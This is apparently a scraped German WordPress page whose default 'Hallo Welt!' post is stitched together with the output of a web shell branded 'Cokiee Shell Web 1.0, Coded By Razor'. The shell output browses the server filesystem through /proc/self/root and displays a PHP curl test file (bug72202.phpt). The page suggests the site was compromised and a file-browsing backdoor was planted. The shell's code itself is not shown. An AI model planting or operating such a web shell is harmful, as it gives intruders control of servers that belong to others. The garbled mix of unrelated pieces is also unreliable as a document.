Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/curl/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/curl/tests/bug72202.phpt |
--TEST-- Bug #72202 (curl_close doesn't close cURL handle) --SKIPIF-- <?php if (!extension_loaded("curl")) { exit("skip curl extension not loaded"); } if (getenv("SKIP_ONLINE_TESTS")) { die("skip online test"); } ?> --FILE-- <?php $a = fopen(__FILE__, "r"); $b = $a; var_dump($a, $b); fclose($a); var_dump($a, $b); unset($a, $b); $a = curl_init(); $b = $a; var_dump($a, $b); curl_close($a); var_dump($a, $b); unset($a, $b); ?> --EXPECTF-- resource(%d) of type (stream) resource(%d) of type (stream) resource(%d) of type (Unknown) resource(%d) of type (Unknown) resource(%d) of type (curl) resource(%d) of type (curl) resource(%d) of type (Unknown) resource(%d) of type (Unknown)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare